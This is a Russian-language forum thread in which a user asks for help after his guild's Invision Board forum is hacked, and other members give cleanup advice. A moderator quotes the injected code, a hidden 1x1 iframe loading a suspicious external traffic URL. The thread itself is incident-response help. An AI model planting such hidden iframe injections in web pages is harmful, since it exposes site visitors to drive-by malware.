Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » IkonBoard и другие форумы » Invision Board » Взломали форум

Модерирует : Antuan, Dekker

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

COMRAD



Gold COMRAD
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Есть у моей гильдии форум. Живёт он у нас давно, на нём куча наших сообщений. И вот в один гадкий день его взломали, индексные файлы заменили какой-то белибердой - что-то вроде попытки продажи CD дисков, да и то криво написанно. Бэкап не делался сто лет... Очень обидно будет просто потерять все данные с форума. Прошу помощи в восстановлении информации.
 
Адрес подбитого форума http://breath.org.ru/forum/ заходить с опаской, хз что там поназасовывали. Я под фаером и антивиром ходил - молчат, но лучше на незащищённых тачках не пробовать.

----------
Вот такая вот х...ня, малята...
Одесситы, сюда

Всего записей: 6758 | Зарегистр. 22-02-2003 | Отправлено: 20:29 26-05-2007
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
COMRAD
ничего там, по сути, не испортили.. просто добавлено это внизу

Цитата:
<HTML><BODY><iframe src='http://trafficservice.cc/in.cgi?default' width='1' height='1' style='visibility: hidden;'></iframe></BODY></HTML><HTML><BODY><iframe src='http://trafficservice.cc/in.cgi?default' width='1' height='1' style='visibility: hidden;'></iframe></BODY></HTML>

убрать
и читать
Кто должен лечить вирусы на сайте: хостер или я?

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 20:33 26-05-2007
COMRAD



Gold COMRAD
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Cheery
Код из твоей цитаты удалил, не помогло. Похоже всё серьёзнее. Вот в середине, например, есть такое:

Цитата:
parent.window.frames[1].document.write("<font size=2><strong>", 'Результат поиска: ', "</strong></font><br><i>Приведены розничные цены в рублях, включая НДС.</i><br><font size=1 color='#800000'><b>Мелкооптовая цена действительна при покупке одного наименования в количестве нормы упаковки и больше.<br>На сумму счета от 5 тыс.руб. предоставляется скидка 3%. При оптовых закупках возможна скидка до 10%.<br></font></b><br><PRE><font face=arial size=1><b>Кликните на выбранную позицию, чтобы добавить ее в заказ.</b></font>", "<PRE>")

 
Может можно восстановить индексные файлы без перестановки форума, либо переставить форум с сохранением базы данных?
 
Список файлов изменённых в одно время:
admin.php
conf_global.php
index.php
init.php
listitems.php
viewevent.php
viewitem.php
viewmember.php
viewnews.php
viewraid.php
 
Может это поможет.

----------
Вот такая вот х...ня, малята...
Одесситы, сюда

Всего записей: 6758 | Зарегистр. 22-02-2003 | Отправлено: 22:58 26-05-2007
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
COMRAD

Цитата:
Код из твоей цитаты удалил, не помогло. Похоже всё серьёзнее. Вот в середине, например, есть такое:

ну есть.. я же не знаю, что у тебя там первоначально было..
смотри все.. в admin.php наверняка оставлен черных вход
если форум не на mysql, то данные не изменены?  я не пользуюсь этим форумом.. говорю об общих вещах

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 23:09 26-05-2007
Brodyaga



Silver Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
1
Проверь MySQL базу. Проверку можно ограничить попыткой доступа в админ-центр. Если заходишь и все данные на месте, тогда все становится проще.
Установи на локальном хосте эту самую версию ipb. Залей все измененные *.php файлы кроме conf_global.php.  
Отредактируй conf_global.php в соответствии с данными mysql на твоем хосте и залей на сервер.Все будет работать.  
 
2
Попроси у хостера файл access.log и посмотри там, примерную дату взлома форума. Проверь, какие запросы посылались. Это вероятно поможет обнаружить дырку, поищи в гугле багфикс. Если ничего такого нет, значит обращайся к хостеру, каким образом хулиган проник на сервер.
IPB 2.*? или 1.3?

----------
Damn Metal

Всего записей: 2713 | Зарегистр. 07-01-2006 | Отправлено: 08:54 27-05-2007
muge

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Попроси у хостера файл access.log и посмотри там, примерную дату взлома форума.
да логи это самое главное

Всего записей: 1 | Зарегистр. 27-05-2007 | Отправлено: 21:39 28-05-2007
Cheery



.:МордератоР:.
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
muge
тебе не кажется, что об этом уже сказали?  
плюс пароли (к примеру от ftp) могли увести и с его машины

----------
Away/DND

Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 21:42 28-05-2007
Beobachter



Full Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
по сути вся инфа храниться в базе, если она цела, то форум можно просто переустановить и поновой прицепить у уже имеющейся базе. Замени все задетые файлы. Думаю многие из перечисленных подпорчены" не были

Всего записей: 597 | Зарегистр. 29-06-2006 | Отправлено: 14:00 29-05-2007
Brodyaga



Silver Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Beobachter
У меня дежавю, или это уже было сказано?!

----------
Damn Metal

Всего записей: 2713 | Зарегистр. 07-01-2006 | Отправлено: 14:29 29-05-2007
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Invision Board » Взломали форум


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru